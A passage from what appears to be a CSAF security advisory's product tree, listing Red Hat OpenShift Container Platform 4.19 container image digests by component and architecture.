"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
